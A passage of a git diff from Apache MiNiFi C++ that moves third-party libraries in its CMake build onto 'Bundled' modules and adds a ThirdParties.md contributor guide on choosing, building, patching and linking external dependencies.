 	createExtension(RDKAFKA-EXTENSIONS "RDKAFKA EXTENSIONS" "This Enables librdkafka functionality including PublishKafka" "extensions/librdkafka" "${TEST_DIR}/kafka-tests")
 endif()
 
 ## Scripting extensions
 option(DISABLE_SCRIPTING "Disables the scripting extensions." OFF)
 if (NOT DISABLE_SCRIPTING)
+	# sol
+	add_library(sol INTERFACE)
+	target_include_directories(sol INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/sol2-2.20.0")
     createExtension(SCRIPTING-EXTENSIONS "SCRIPTING EXTENSIONS" "This enables scripting" "extensions/script" "${TEST_DIR}/script-tests")
 endif()
 
+# Sensors extensions
 option(ENABLE_SENSORS "Enables the Sensors package." OFF)
 if(ENABLE_ALL OR ENABLE_SENSORS)
 	add_subdirectory(thirdparty/RTIMULib/RTIMULib)
@@ -523,13 +372,17 @@
 ## SQLite extensions
 option(ENABLE_SQLITE "Disables the scripting extensions." OFF)
 if (ENABLE_ALL OR ENABLE_SQLITE)
-    createExtension(SQLITE-EXTENSIONS "SQLITE EXTENSIONS" "This enables sqlite" "extensions/sqlite" "${TEST_DIR}/sqlite-tests" "TRUE" "thirdparty/sqlite")
+	include(BundledSQLite)
+	use_bundled_sqlite(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+    createExtension(SQLITE-EXTENSIONS "SQLITE EXTENSIONS" "This enables sqlite" "extensions/sqlite" "${TEST_DIR}/sqlite-tests")
 endif()
 
 ## USB camera extensions
 option(ENABLE_USB_CAMERA "Enables USB camera support." OFF)
 if (ENABLE_ALL OR ENABLE_USB_CAMERA)
-    createExtension(USB-CAMERA-EXTENSIONS "USB CAMERA EXTENSIONS" "This enables USB camera support" "extensions/usb-camera" "${TEST_DIR}/usb-camera-tests" "TRUE" "thirdparty/libuvc-0.0.6")
+	include(BundledLibUvc)
+	use_bundled_libuvc(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+    createExtension(USB-CAMERA-EXTENSIONS "USB CAMERA EXTENSIONS" "This enables USB camera support" "extensions/usb-camera" "${TEST_DIR}/usb-camera-tests")
 endif()
 
 ## TensorFlow extensions
@@ -542,7 +395,9 @@
 ## AWS Extentions
 option(ENABLE_AWS "Enables AWS support." OFF)
 if (ENABLE_AWS)
-	createExtension(AWS-EXTENSIONS "AWS EXTENSIONS" "This enables AWS support" "extensions/aws" )
+	include(BundledAwsSdkCpp)
+	use_bundled_libaws(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	createExtension(AWS-EXTENSIONS "AWS EXTENSIONS" "This enables AWS support" "extensions/aws")
 endif()
 
 ## OpenCV Extesions
@@ -555,56 +410,41 @@
 ## Bustache/template extensions
 option(ENABLE_BUSTACHE "Enables Bustache (ApplyTemplate) support." OFF)
 if (ENABLE_BUSTACHE)
-    createExtension(BUSTACHE-EXTENSIONS "BUSTACHE EXTENSIONS" "This enables bustache functionality including ApplyTemplate." "extensions/bustache" "${TEST_DIR}/bustache-tests" "TRUE" "thirdparty/bustache")
+	include(BundledBustache)
+	use_bundled_bustache(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+    createExtension(BUSTACHE-EXTENSIONS "BUSTACHE EXTENSIONS" "This enables bustache functionality including ApplyTemplate." "extensions/bustache" "${TEST_DIR}/bustache-tests")
 endif()
 
 ## OPC Extentions
 if (ENABLE_OPC)
 	include(BundledMbedTLS)
 	use_bundled_mbedtls(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/mbedtls/dummy")
 
 	include(BundledOpen62541)
 	use_bundled_open62541(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
 
-	createExtension(OPC-EXTENSIONS "OPC EXTENSIONS" "This enables OPC-UA support" "extensions/opc" )
+	createExtension(OPC-EXTENSIONS "OPC EXTENSIONS" "This enables OPC-UA support" "extensions/opc")
 endif()
 
 ## SFTP extensions
 option(ENABLE_SFTP "Enables SFTP support." OFF)
 if ((ENABLE_ALL OR ENABLE_SFTP) AND NOT DISABLE_CURL)
-    if(WIN32 OR NOT USE_SYSTEM_LIBSSH2)
-        include(LibSSH2)
-        use_bundled_libssh2(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
-        list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/libssh2/dummy")
-    else()
-        list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/libssh2/sys")
-        find_package (LibSSH2 REQUIRED)
-    endif()
+	include(BundledLibSSH2)
+	use_bundled_libssh2(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+	list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/libssh2/dummy")
 
     createExtension(SFTP "SFTP EXTENSIONS" "This enables SFTP support" "extensions/sftp" "extensions/sftp/tests")
-
-    if(NOT USE_SYSTEM_LIBSSH2)
-        message("minifi-sftp will depend on libssh2-external")
-        add_dependencies(minifi-sftp libssh2-external)
-    endif()
-    message("minifi-sftp will depend on curl-external")
-    add_dependencies(minifi-sftp curl-external)
-    if(NOT USE_SYSTEM_ZLIB)
-        message("minifi-sftp will depend on zlib-external")
-        add_dependencies(minifi-sftp zlib-external)
-    endif()
 endif()
 
 
 ## NOW WE CAN ADD LIBRARIES AND EXTENSIONS TO MAIN
-
 add_subdirectory(main)
 add_subdirectory(nanofi)
 
 add_dependencies(nanofi minifiexe)
 
 if (NOT DISABLE_CURL AND NOT DISABLE_CONTROLLER)
-	add_subdirectory(thirdparty/cxxopts)
 	add_subdirectory(controller)
 	add_dependencies(minificontroller minifiexe)
 endif()
@@ -629,38 +469,36 @@
 message("BUILD_IDENTIFIER is ${BUILD_IDENTIFIER}")
 
 if (WIN32)
-
-# Get the latest abbreviated commit hash of the working branch
-execute_process(
-  COMMAND git log -1 --format=%h
-  WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}
-  OUTPUT_VARIABLE BUILD_REV
-  OUTPUT_STRIP_TRAILING_WHITESPACE
-)
-	execute_process(COMMAND 
-			"${CMAKE_CURRENT_SOURCE_DIR}/generateVersion.bat" 
-			"${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}" 
-			${CMAKE_CURRENT_SOURCE_DIR} 
-			${CMAKE_CURRENT_SOURCE_DIR}/libminifi/include/agent/ 
+	# Get the latest abbreviated commit hash of the working branch
+	execute_process(
+			COMMAND git log -1 --format=%h
+			WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}
+			OUTPUT_VARIABLE BUILD_REV
+			OUTPUT_STRIP_TRAILING_WHITESPACE)
+	execute_process(COMMAND
+			"${CMAKE_CURRENT_SOURCE_DIR}/generateVersion.bat"
+			"${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}"
+			${CMAKE_CURRENT_SOURCE_DIR}
+			${CMAKE_CURRENT_SOURCE_DIR}/libminifi/include/agent/
 			"${CMAKE_CXX_COMPILER}"
-			"${CMAKE_CXX_COMPILER_VERSION}" 
-			"${CMAKE_CXX_FLAGS}" 
+			"${CMAKE_CXX_COMPILER_VERSION}"
+			"${CMAKE_CXX_FLAGS}"
 			\"${selected_extensions}\"
 			"${BUILD_IDENTIFIER}"
 			"${BUILD_REV}")
 else()
 	execute_process(COMMAND 
-		"${CMAKE_CURRENT_SOURCE_DIR}/generateVersion.sh" 
-		"${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}" 
-		${CMAKE_CURRENT_SOURCE_DIR} 
-		${CMAKE_CURRENT_SOURCE_DIR}/libminifi/include/agent/ 
-		"${CMAKE_CXX_COMPILER}"
-		"${CMAKE_CXX_COMPILER_VERSION}" 
-		"${CMAKE_CXX_FLAGS}" 
-		"${selected_extensions}" 
-		"${BUILD_IDENTIFIER}")
-
+			"${CMAKE_CURRENT_SOURCE_DIR}/generateVersion.sh"
+			"${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}"
+			${CMAKE_CURRENT_SOURCE_DIR}
+			${CMAKE_CURRENT_SOURCE_DIR}/libminifi/include/agent/
+			"${CMAKE_CXX_COMPILER}"
+			"${CMAKE_CXX_COMPILER_VERSION}"
+			"${CMAKE_CXX_FLAGS}"
+			"${selected_extensions}"
+			"${BUILD_IDENTIFIER}")
 endif()
+
 # Generate source assembly
 set(ASSEMBLY_BASE_NAME "${CMAKE_PROJECT_NAME}-${PROJECT_VERSION_MAJOR}.${PROJECT_VERSION_MINOR}.${PROJECT_VERSION_PATCH}")
 if(WIN32)
@@ -721,18 +559,17 @@
 
 # Generate binary assembly. Exclude conf for windows since we'll be doing the work in the WiX template
 if (NOT WIN32)
-install(FILES conf/minifi.properties conf/minifi-log.properties conf/minifi-uid.properties conf/config.yml
-        DESTINATION conf
-        COMPONENT bin)
-        
-install(DIRECTORY extensions/pythonprocessors/
-        DESTINATION minifi-python
-        COMPONENT bin)
+	install(FILES conf/minifi.properties conf/minifi-log.properties conf/minifi-uid.properties conf/config.yml
+			DESTINATION conf
+			COMPONENT bin)
 
+	install(DIRECTORY extensions/pythonprocessors/
+			DESTINATION minifi-python
+			COMPONENT bin)
 
-install(PROGRAMS bin/minifi.sh
-        DESTINATION bin
-        COMPONENT bin)
+	install(PROGRAMS bin/minifi.sh
+			DESTINATION bin
+			COMPONENT bin)
 endif()
 
 install(FILES LICENSE README.md NOTICE
@@ -740,17 +577,17 @@
         COMPONENT bin)
 
 if(WIN32)
-#preference is to use the exe type so that we have a solution that works well for cross compilation
-#but that leaves the onus up to the developer, so until we can automate some of that build let's enforce
-#the exe here temporarily
-#TODO: Remove this and automate this step.
-#install(PROGRAMS ${CMAKE_CURRENT_BINARY_DIR}/main/minifi.exe
-        #DESTINATION bin
-        #COMPONENT bin)
+	#preference is to use the exe type so that we have a solution that works well for cross compilation
+	#but that leaves the onus up to the developer, so until we can automate some of that build let's enforce
+	#the exe here temporarily
+	#TODO: Remove this and automate this step.
+	#install(PROGRAMS ${CMAKE_CURRENT_BINARY_DIR}/main/minifi.exe
+			#DESTINATION bin
+			#COMPONENT bin)
 else()
-install(PROGRAMS ${CMAKE_CURRENT_BINARY_DIR}/main/minifi
-        DESTINATION bin
-        COMPONENT bin)   
+	install(PROGRAMS ${CMAKE_CURRENT_BINARY_DIR}/main/minifi
+			DESTINATION bin
+			COMPONENT bin)
 endif() 
         
 			
diff --git a/CONTRIB.md b/CONTRIB.md
index 6e25262..d651108 100644
--- a/CONTRIB.md
+++ b/CONTRIB.md
@@ -37,6 +37,10 @@
      
 This will provide output for all source files.
 
+### Third parties
+
+Please see [ThirdParties.md](ThirdParties.md) on how MiNiFi builds and uses third party libraries and how you can add new ones.
+
 ### Extensions 
 
 MiNiFi C++ contains a dynamic loading mechanism that loads arbitrary objects. To maintain consistency of development amongst the NiFi ecosystem, it is called a class loader. If you
diff --git a/NOTICE b/NOTICE
index 7d07a68..a62ca67 100644
--- a/NOTICE
+++ b/NOTICE
@@ -21,8 +21,7 @@
 This includes derived works from the cURL (MIT/X-style licensed) project (https://github.com/curl/curl):
 Copyright (c) 1996 - 2019, Daniel Stenberg, <daniel@haxx.se>, and many contributors, see the THANKS file.
 The derived work is adapted from
-  CMake/FindLibSSH2.cmake
-and can be found in cmake/libssh2/sys/FindLibSSH2.cmake
+  CMake/FindLibSSH2.cmake and can be found in cmake/libssh2/sys/FindLibSSH2.cmake
 
 This includes derived works from the CMake (BSD 3-Clause licensed) project (https://github.com/Kitware/CMake):
 Copyright 2000-2019 Kitware, Inc. and Contributors
diff --git a/ThirdParties.md b/ThirdParties.md
new file mode 100644
index 0000000..a2aca32
--- /dev/null
+++ b/ThirdParties.md
@@ -0,0 +1,393 @@
+<!--
+  Licensed to the Apache Software Foundation (ASF) under one or more
+  contributor license agreements.  See the NOTICE file distributed with
+  this work for additional information regarding copyright ownership.
+  The ASF licenses this file to You under the Apache License, Version 2.0
+  (the "License"); you may not use this file except in compliance with
+  the License.  You may obtain a copy of the License at
+      http://www.apache.org/licenses/LICENSE-2.0
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+-->
+# Apache MiNiFi C++ Third Parties guide
+
+Apache MiNiFi C++ uses many third party libraries, both for core functionality and for extensions.
+
+This document describes the way we build and use third parties and provides a guide for adding new ones.
+
+## Table of Contents
+
+  * [Table of Contents](#table-of-contents)
+  * [Choosing a third party](#choosing-a-third-party)
+    + [License](#license)
+  * [Built-in or system dependency](#built-in-or-system-dependency)
+  * [System dependency](#system-dependency)
+    + [bootstrap.sh](#bootstrapsh)
+    + [Find\<Package\>.cmake](#find--package--cmake)
+    + [find_package](#find-package)
+  * [Built-in dependency](#built-in-dependency)
+    + [ExternalProject_Add](#externalproject-add)
+      - [`URL` and `GIT`](#-url--and--git-)
+      - [`SOURCE_DIR`](#-source-dir-)
+      - [`PATCH_COMMAND`](#-patch-command-)
+      - [`CMAKE_ARGS`](#-cmake-args-)
+      - [`BUILD_BYPRODUCTS`](#-build-byproducts-)
+      - [`EXCLUDE_FROM_ALL`](#-exclude-from-all-)
+      - [`LIST_SEPARATOR`](#-list-separator-)
+    + [Choosing a source](#choosing-a-source)
+    + [Patching](#patching)
+    + [Build options](#build-options)
+    + [find_package-like variables](#find-package-like-variables)
+    + [Imported library targets](#imported-library-targets)
+    + [Using third parties in other third parties](#using-third-parties-in-other-third-parties)
+      - [Making a third party available to other third parties](#making-a-third-party-available-to-other-third-parties)
+        * [Find\<Package\>.cmake](#find--package--cmake-1)
+        * [Passthrough variables](#passthrough-variables)
+      - [Using a third party from another third party](#using-a-third-party-from-another-third-party)
+        * [Dependencies](#dependencies)
+        * [CMake module path and passthrough args](#cmake-module-path-and-passthrough-args)
+    + [Interface libraries](#interface-libraries)
+
+
+## Choosing a third party
+
+Deciding if a third party is needed for a particular task and if so, choosing between the different implementations is difficult. A few points that have to considered are:
+ - every third party introduces risk, both operational and security
+ - every third party adds a maintenance burden: it has to be tracked for issues, updated, adapted to changes in the build framework
+ - not using a third party and relying on less tested homegrown solutions however usually carry a greater risk than using one
+ - introducing a new third party dependency to the core should be done with the utmost care. If we make a third party a core dependency, it will increase build time, executable size and the burden to maintain API compatibility.
+
+A few tips to choose a third party:
+ - you have to choose a third party with a [proper license](#license)
+ - prefer well-maintained third parties. Abandoned projects will have a huge maintenance burden.
+ - prefer third parties with frequent/regular releases. There are some projects with a huge number of commits and a very long time since the last release, and we are at a disadvantage in determining whether the actual state of the master is stable: the maintainers should be the judges of that.
+ - prefer third parties with the smaller number of transitive dependencies. If the third party itself needs other third parties, that increases the work greatly to get it done properly at the first time and then maintain it afterwards.
+
+### License
+Only third parties with an Apache License 2.0-compatible license may be linked with this software.
+
+To make sure the third party's license is compatible with Apache License 2.0, refer to the [ASF 3RD PARTY LICENSE POLICY
+](https://www.apache.org/legal/resolved.html). Please also note that license compatibility is a one-way street: a license may be compatible with Apache License 2.0 but not the other way round.
+
+GPL and LGPL are generally not compatible.
+
+## Built-in or system dependency
+When deciding whether a third party dependency should be provided by the system, or compiled and shipped by us, there are many factors to consider.
+
+|          | Advantages                                                                          | Disadvantages                                              |
+|----------|-------------------------------------------------------------------------------------|------------------------------------------------------------|
+| System   | Smaller executable size                                                             | Less control over third-party                              |
+|          | Faster compilation                                                                  | Can't add patches                                          |
+|          |                                                                                     | Has to be supported out-of-the box on all target platforms |
+|          |                                                                                     | Usually not available on Windows                           |
+| Built-in | High level of control over third-party (consistent version and features everywhere) | Larger executable size                                     |
+|          | Can add patches                                                                     | Slower compilation                                         |
+|          | Does not have to be supported by the system                                         |                                                            |
+|          | Works on Windows                                                                    |                                                            |
+
+Even if choosing a system dependency, a built-in version for Windows usually has to be made.
+
+Both a system and a built-in version can be supported, in which case the choice should be configurable via CMake options.
+
+**The goal is to abstract the nature of the third party from the rest of the project**, and create targets from them, that automatically take care of building or finding the third party and any dependencies, be it target, linking or include.
+
+## System dependency
+
+To add a new system dependency, you have to follow the following steps:
+
+### bootstrap.sh
+
+If you are using a system dependency, you have to ensure that the development packages are installed on the build system if the extension is selected.
+
+To ensure this, edit `bootstrap.sh` and all the platform-specific scripts (`centos.sh`, `fedora.sh`, `debian.sh`, `suse.sh`, `rheldistro.sh`, `darwin.sh`).
+
+### Find\<Package\>.cmake
+
+If a `Find<Package>.cmake` is provided for your third party by not unreasonably new (not later than 3.2) CMake versions out of the box, then you have nothing further to do, unless they don't create imported library targets.
+
+If it is not provided, you have three options
+ - if a newer CMake version provides it, you can try "backporting it"
+ - you can search for an already implemented one in other projects with an acceptable license
+ - if everything else fails, you can write one yourself
+
+If you don't end up writing it from scratch, make sure that you indicate the original source in the `NOTICE` file and add the proper license to the `LICENSE` file.
+
+If you need to add a `Find<Package>.cmake` file, add it as `cmake/<package>/sys/Find<Package>.cmake`, and add it to the `CMAKE_MODULE_PATH`.
+
+### find_package
+
+After you have a working `Find<Package>.cmake`, you have to call `find_package` to actually find the package, most likely with the REQUIRED option to set, to make it fail if it can't find it.
+
+Example:
+```
+find_package(Lib<Package> REQUIRED)
+```
+
+## Built-in dependency
+We thrive to build all third party dependencies using the [External Projects](https://cmake.org/cmake/help/latest/module/ExternalProject.html) CMake feature. This has many advantages over adding the third party source to our own CMake-tree with add_subdirectory:
+ - ExternalProject_Add works with non-CMake third parties
+ - we have greater control over what variables are passed to the third party project
+ - we don't have to patch the third parties to avoid target and variable name collisions
+ - we don't have to include the third party sources in our repository
+
+There are some exceptions to using External Projects:
+ - header only libraries don't require it (you could still use ExternalProject_Add to download and unpack the sources, but it is easier to just include the source in our repository and create an INTERFACE target from them).
+ - there are some libraries (notably OpenCV) which generate so many targets in so many configurations and interdependencies between the targets that it is impractical to use imported library targets with them
+ - there are a few third parties that have not yet been converted to an External Project, but they will be, eventually
+
+To add a new built-in dependency, the easiest way is to use an already existing one as a template.
+
+You will need to do the following steps:
+ - create `cmake/Bundled<Package>.cmake`
+ - (optional) if you want to use this from other third parties, create `cmake/<package>/dummy/Find<Package>.cmake`
+ - call the function created in `Bundled<Package>.cmake` in the main `CMakeLists.txt`:
+     ```
+     include(Bundled<Package>)
+     use_bundled_<package>(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})
+     ```
+     If you created `cmake/<package>/dummy/Find<Package>.cmake` you should also add that to the module path:
+     ```
+     list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/<package>/dummy")
+     ```
+     These should be in an extension's enabled conditional path, if the third party is only used by one extension, or in the section for third parties used by multiple packages, if used by more.
+ - Link your extension with the imported third party targets. If everything is done right, dependencies, transitive library linkings and include paths should work automatically.
+
+### ExternalProject_Add
+`ExternalProject_Add` creates a custom target that will build the third party according to our configuration.
+
+It has many options, some of which are described in greater detail later. Let's take a look at the most important ones:
+
+#### `URL` and `GIT`
+Used for fetching the source. In the case of `URL`, it is automatically unpacked. In the case of `GIT` the specified tag is checked out.
+
+See [Choosing a source](#choosing-a-source) for greater detail.
+
+Example:
+```
+GIT "https://github.com/<package>/<package>.git"
+GIT_TAG "v1.0.0"
+```
+```
+URL "https://github.com/<package>/<package>/archive/v1.0.0.tar.gz"
+URL_HASH "SHA256=9b640b13047182761a99ce3e4f000be9687566e0828b4a72709e9e6a3ef98477"
+```
+
+#### `SOURCE_DIR`
+The directory to which will be unpacked/cloned. Must be in the `BINARY_DIR`, so that we don't contaminate our source.
+
+Example:
+```
+SOURCE_DIR "${BINARY_DIR}/thirdparty/package-src"
+```
+
+#### `PATCH_COMMAND`
+Specifies a custom command to run after the source has been downloaded/updated. Needed for applying patches and in the case of non-CMake projects run custom scripts.
+
+See [Patching](#patching) for greater detail.
+
+#### `CMAKE_ARGS`
+Specifies the arguments to pass to the cmake command line.
+
+Be sure to include `${PASSTHROUGH_CMAKE_ARGS}` in this list, because it contains the basic information (compiler, build type, generator, etc.) to the third party, that must be consistent across our entire build.
+
+See [Build options](#build-options) for greater detail.
+
+#### `BUILD_BYPRODUCTS`
+`ExternalProject_Add` needs to know the list of artifacts that are generated by the third party build (and that we care about), so that it can track their modification dates.
+
+This can be usually set to the list of library archives generated by the third party.
+
+Example:
+```
+BUILD_BYPRODUCTS "${<PACKAGE>_BYPRODUCT_DIR}/lib/lib<package>.lib"
+```
+
+#### `EXCLUDE_FROM_ALL`
+This is required so that the custom target created by `ExternalProject_Add` does not get added to the default `ALL` target. This is something we generally want to avoid, as third party dependencies only make sense, if our code depends on them. We don't want them to be top-level targets and built unconditionally.
+
+#### `LIST_SEPARATOR`
+[CMake lists](https://cmake.org/cmake/help/v3.12/command/list.html#introduction) are `;` separated group of strings. When we pass `ExternalProject_Add` a list of arguments in `CMAKE_ARGS` to pass to the third party project, some of those arguments might be lists themselves (list of `CMAKE_MODULES_PATH`-s, for example), which causes issues.
+
+To avoid this, when passing list arguments, the `;`-s should be replaced with `%`-s, and the `LIST_SEPARATOR` set to `%` (it could be an another character, but as `%` is pretty uncommon both in paths and other arguments, it is a good choice).
+
+Even if you don't yourself use list arguments, many parts of the build infrastructure do, like exported targets, so to be safe, set this.
+
+Example:
+```
+string(REPLACE ";" "%" LIST_ARGUMENT_TO_PASS "${LIST_ARGUMENT}")
+
+[...]
+
+LIST_SEPARATOR %
+CMAKE_ARGS -DFOO=ON
+           -DBAR=OFF
+           "-DLIST_ARGUMENT=${LIST_ARGUMENT_TO_PASS}"
+```
+
+### Choosing a source
+Prefer artifacts from the official release site or a reliable mirror. If that is not available, use the https links for releases from GitHub.
+
+Only use a git repo in a last resort:
+ - applying patches to git clones is very flaky in CMake
+ - it usually takes longer to clone a git repo than to download a specific version
+
+When using the `URL` download method, **always** use `URL_HASH` with SHA256 to verify the integrity of the downloaded artifact.
+
+When using the `GIT` download method, use the textual tag of the release instead of the commit id as the `GIT_TAG`.
+
+### Patching
+Adding patches to a third party is sometimes necessary, but maintaining a local patch set is error-prone and takes a lot of work.
+
+Before patching, please consider whether your goal could be achieved by other ways. Perhaps there is a CMake option that can disable the particular feature you want to comment out. If the third party is not the latest released version, there might be a fix upstream already released, and you can update the third party.
+
+If after all you decide the best option is patching, please follow these guidelines:
+ - keep the patch minimal: it is easier to maintain a smaller patch
+ - separate logically different patches to separate patch files: if something is fixed upstream, it is easy to remove the specific patch file for it
+ - place the patch files into the `thirdparty/<third party name>/` directory and use them from there
+ - write ExternalProject_Add's patch step in a platform-independent way: the patch executable on the system is determined in the main CMakeLists.txt, you should use that. An example command looks like this:
+   ```
+   "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/<package>/<package>.patch"
+   ```
+
+### Build options
+Both CMake and configure.sh based third parties usually come with many configuration options.
+When integrating a new third party, these should be reviewed and the proper ones set.
+
+Make sure you disable any parts that is not needed (tests, examples, unneeded features). Doing this has multiple advantages:
+ - faster compilation
+ - less security risk: if something is not compiled in, a vulnerability in that part can't affect us
+ - greater control: e.g. we don't accidentially link with an another third party just because it was available on the system and was enabled by default
+
+### find_package-like variables
+When using imported library targets, having the variables generated by `find_package(Package)`, like `PACKAGE_FOUND`, `PACKAGE_LIBRARIES` and `PACKAGE_INCLUDE_PATHS` is not necessary, because these are already handled by the imported target's interface link and include dependencies.
+
+However, these are usually provided by built-in packages, for multiple reasons:
+ - backwards compatibility: proprietary extensions might depend on them (for already existing third parties)
+ - defining these is required for importing the target, and defining its link and include interface dependencies, so we might just add them
+ - if we want to export this third party to other third parties, the dummy `Find<Package>.cmake` will require these variables anyway
+
+### Imported library targets
+[Imported library targets](https://cmake.org/cmake/help/v3.2/command/add_library.html#imported-libraries) reference a library file located outside the project.
+
+They - like other library targets - can have interface (transitive) library link, include dir and compile definitions.
+These dependencies define, respectively, what other libraries should be linked with the target that links this library, what include paths should be added when compiling a target linking to this library, and what compile flags should be added when compiling a target linking to this library.
+
+If the third party creates multiple library archives, one imported target should be created for each of them, creating the proper dependencies between them, if necessary.
+
+The imported targets should be made dependent on the target created by `ExternalProject_Add`, to make sure that we really have the proper artifacts before we want to use them.
+
+Imported targets are customarily named like `PACKAGE::libPackage`
+
+Unfortunately older CMake versions don't support `target_include_directories` and `target_link_libraries` for IMPORTED targets, so we have to work this around by directly interacting with the `INTERFACE_INCLUDE_DIRECTORIES` and `INTERFACE_LINK_LIBRARIES` lists of the target. Because of this, we also have to make sure that the include directory resulting from the installation of the third party is created beforehand, so that CMake won't complain about a non-existing directory.
+
+Example:
+```
+file(MAKE_DIRECTORY ${PACKAGE_INCLUDE_DIRS})
+
+add_library(PACKAGE::libHelper STATIC IMPORTED)
+set_target_properties(PACKAGE::libHelper PROPERTIES
+        INTERFACE_INCLUDE_DIRECTORIES "${PACKAGE_INCLUDE_DIRS}")
+set_target_properties(PACKAGE::libHelper PROPERTIES
+        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+        IMPORTED_LOCATION "${HELPER_LIBRARY}")
+add_dependencies(PACKAGE::libHelper package-external)
+
+add_library(PACKAGE::libPackage STATIC IMPORTED)
+set_target_properties(PACKAGE::libPackage PROPERTIES
+        INTERFACE_INCLUDE_DIRECTORIES "${PACKAGE_INCLUDE_DIRS}")
+set_target_properties(PACKAGE::libPackage PROPERTIES
+        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+        IMPORTED_LOCATION "${PACKAGE_LIBRARY}")
+add_dependencies(PACKAGE::libPackage package-external)
+set_property(TARGET PACKAGE::libPackage APPEND PROPERTY INTERFACE_LINK_LIBRARIES PACKAGE::libHelper)
+```
+
+### Using third parties in other third parties
+Third party libraries can depend on other third party libraries. In this case, we obviously want all third parties to use the other third parties built by us, and not start trying to find them on the system.
+
+To make a third party (user third party) use an another third party (provider third party), we have to
+ - make sure the provider third party gets built before the user third party
+ - create a `Find<Package>.cmake` file for the provider third party
+ - make the user third party use this `Find<Package>.cmake` to find the provider third party
+ - pass all variables used by the provider third party's `Find<Package>.cmake` to the user third party
+ - if there are multiple dependencies, do this for every single one of them
+
+This is a complex and error-prone task, so to make it easier, a helper architecture is used.
+
+#### Making a third party available to other third parties
+
+##### Find\<Package\>.cmake
+Create `cmake/<package>/dummy/Find<Package>.cmake` like this:
+```
+if(NOT <PACKAGE>_FOUND)
+  set(<PACKAGE>_FOUND "YES" CACHE STRING "" FORCE)
+  set(<PACKAGE>_INCLUDE_DIR "${EXPORTED_<PACKAGE>_INCLUDE_DIR}" CACHE STRING "" FORCE)
+  set(<PACKAGE>_LIBRARY ${EXPORTED_<PACKAGE>_LIBRARY} CACHE STRING "" FORCE)
+endif()
+
+if(NOT TARGET <PACKAGE>::lib<Package>)
+  add_library(<PACKAGE>::lib<Package> STATIC IMPORTED)
+  set_target_properties(<PACKAGE>::lib<Package> PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${<PACKAGE>_INCLUDE_DIR}")
+  set_target_properties(<PACKAGE>::lib<Package> PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+          IMPORTED_LOCATION "${<PACKAGE>_LIBRARY}")
+endif()
+```
+You have to use the variables that are used by the non-dummy `Find<Package>.cmake` (and consequently used by the third party).
+You only need to create imported targets here if the third party uses it instead of the variables.
+
+Once that's done, add it to the `CMAKE_MODULE_PATH` in the main `CMakeLists.txt`:
+```
+list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/<package>/dummy")
+```
+
+##### Passthrough variables
+You will also have to supply the variables used by this `Find<Package>.cmake`.
+The `PASSTHROUGH_VARIABLES` cache list is used for this: you have to append all the variables you want to pass to this list, as CMake passthrough variables.
+The variables must begin with `EXPORTED_` and must be prefixed with the third party's name, to make sure there are no collisions:
+```
+set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_<PACKAGE>_INCLUDE_DIR=${<PACKAGE>_INCLUDE_DIR}" CACHE STRING "" FORCE)
+set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_<PACKAGE>_LIBRARY=${<PACKAGE>_LIBRARY}" CACHE STRING "" FORCE)
+```
+`PASSTHROUGH_VARIABLES` will be used by the helper function that passes all necessary variables to other third parties using this third party.
+
+#### Using a third party from another third party
+
+##### Dependencies
+You have to make sure the third party is available before you want to use it from an another third party.
+To ensure this, make the ExternalProject depend on the imported targets from the third party you want to use. This way the exact mode in which the third party will be provided is abstracted and can be adapted by the provider third party without breaking us:
+```
+add_dependencies(lib<package>-external FOO::libFoo BAR::libBar)
+```
+
+##### CMake module path and passthrough args
+To pass our CMake module paths and the variables used by them you can use the `append_third_party_passthrough_args` helper function that will append everyhting needed to your `CMAKE_ARGS`:
+```
+append_third_party_passthrough_args(<PACKAGE>_CMAKE_ARGS "${<PACKAGE>_CMAKE_ARGS}")
+```
+Make sure you also have [`LIST_SEPARATOR`](#list_separator) set to `%`, as we pass lists here.
+
+Unfortunately some third parties are written in a way that they override the `CMAKE_MODULE_PATH` passed to them via CMake args.
+If this is the case, you will have to patch the third party and change something like this
+```
+set(CMAKE_MODULE_PATH ${CMAKE_CURRENT_SOURCE_DIR}/cmake)
+```
+to this
+```
+list(APPEND CMAKE_MODULE_PATH ${CMAKE_CURRENT_SOURCE_DIR}/cmake)
+```
+
